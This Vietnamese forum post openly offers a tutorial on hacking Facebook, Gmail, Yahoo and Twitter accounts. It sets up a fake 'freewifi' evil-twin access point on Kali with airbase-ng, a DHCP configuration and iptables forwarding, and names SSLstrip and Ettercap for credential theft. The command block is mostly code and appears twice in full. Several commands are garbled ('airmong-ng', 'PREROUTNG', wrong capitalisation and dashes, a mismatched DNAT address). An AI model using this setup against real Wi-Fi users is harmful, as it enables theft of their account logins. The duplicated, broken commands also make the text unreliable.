Hackerstudent93
VIP Members
-
30/09/2013
-
38
-
340 bài viết
Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỷ
Hôm nay mình sẽ hướng dẫn các Hack facbook , gmail, yahoo, twitter bằng cách Bằng cách Create a fake, malicious Wireless Network using Kali.
Ý tưởng thế này: chúng ta sẽ phát ra một mạng wifi giả mạo với tên là " wifi free " rồi cho người dùng tha hồ mà truy cập vào dùng miễn phí, sau đó chúng ta sẽ đánh cắp user và password của họ bằng cách sử dụng tool SSlstrip và Ettercap trong kali
Bên dưới là tất cả các lệnh mà các bạn sẽ sử dụng
- Nhận default bằng cách sử dụng lệnh
route -n
- Cài đặt DHCP3 Server bằng cách sử dụng lệnh
sudo apt-get install dhcp3-server
- Nào bây giờ chúng ta sẽ edit file cấu hình DHCP như sau
vi /etc/dhcpd.conf
Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0 {
Option routers 192.168.1.1;
Option subnet-mask 255.255.255.0;
Option domain-name “freewifi”;
Option domain-name-servers 192.168.1.1;
Range 192.168.1.2 192.168.1.40;
}
sau đó thì lưa lại
- Tiếp theo gõ
airmon-ng
Start monitor mode bằng cách sử dụng lệnh
airmong-ng start wlan0
- Tạo một fake access point bằng cách sử dụng lệnh
airbase-ng -c 11 -e freewifi mon0
- Và bây giờ thì nhập tất cả các lệnh sau cho thật chính xác và cẩn thận
Ifconfig at0 192.168.1.1 netmask 255.255.255.0
Ifconfig at0 mtu 1400
Route add –net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Echo 1 > /proc/sys/net/ipv4/ip_forward
Iptables –t nat –A PREROUTNG –p udp –j DNAT –to 192.168.0.1
Bên dưới là tất cả các lệnh mà các bạn sẽ sử dụng
- Nhận default bằng cách sử dụng lệnh
route -n
- Cài đặt DHCP3 Server bằng cách sử dụng lệnh
sudo apt-get install dhcp3-server
- Nào bây giờ chúng ta sẽ edit file cấu hình DHCP như sau
vi /etc/dhcpd.conf
Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0 {
Option routers 192.168.1.1;
Option subnet-mask 255.255.255.0;
Option domain-name “freewifi”;
Option domain-name-servers 192.168.1.1;
Range 192.168.1.2 192.168.1.40;
}
sau đó thì lưa lại
- Tiếp theo gõ
airmon-ng
Start monitor mode bằng cách sử dụng lệnh
airmong-ng start wlan0
- Tạo một fake access point bằng cách sử dụng lệnh
airbase-ng -c 11 -e freewifi mon0
- Và bây giờ thì nhập tất cả các lệnh sau cho thật chính xác và cẩn thận
Ifconfig at0 192.168.1.1 netmask 255.255.255.0
Ifconfig at0 mtu 1400
Route add –net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Echo 1 > /proc/sys/net/ipv4/ip_forward
Iptables –t nat –A PREROUTNG –p udp –j DNAT –to 192.168.0.1
Chỉnh sửa lần cuối bởi người điều hành: